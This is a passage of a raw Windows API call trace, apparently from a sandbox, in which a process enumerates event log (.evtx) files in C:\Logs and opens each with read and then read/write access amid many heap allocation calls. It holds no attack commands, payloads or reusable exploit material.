0x71960 [0072.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.827] AreFileApisANSI () returned 1 [0072.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0072.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0072.827] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.827] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0072.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0072.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0072.828] AreFileApisANSI () returned 1 [0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpUsedDefaultChar=0x0) returned 66 [0072.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.829] AreFileApisANSI () returned 1 [0072.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0072.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0072.829] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.830] GetFileType (hFile=0x428) returned 0x1 [0072.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0072.830] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.830] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.830] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.830] CloseHandle (hObject=0x428) returned 1 [0072.830] AreFileApisANSI () returned 1 [0072.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0072.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0072.831] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.831] GetFileType (hFile=0x428) returned 0x1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0072.831] CloseHandle (hObject=0x428) returned 1 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0072.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.832] AreFileApisANSI () returned 1 [0072.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x829e8 [0072.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0072.832] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0072.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.832] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.833] AreFileApisANSI () returned 1 [0072.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0072.833] AreFileApisANSI () returned 1 [0072.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46978 [0072.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0072.834] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.834] GetFileType (hFile=0x428) returned 0x1 [0072.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0072.834] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.834] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.834] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.834] CloseHandle (hObject=0x428) returned 1 [0072.835] AreFileApisANSI () returned 1 [0072.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0072.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0072.835] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.835] GetFileType (hFile=0x428) returned 0x1 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.835] CloseHandle (hObject=0x428) returned 1 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.835] 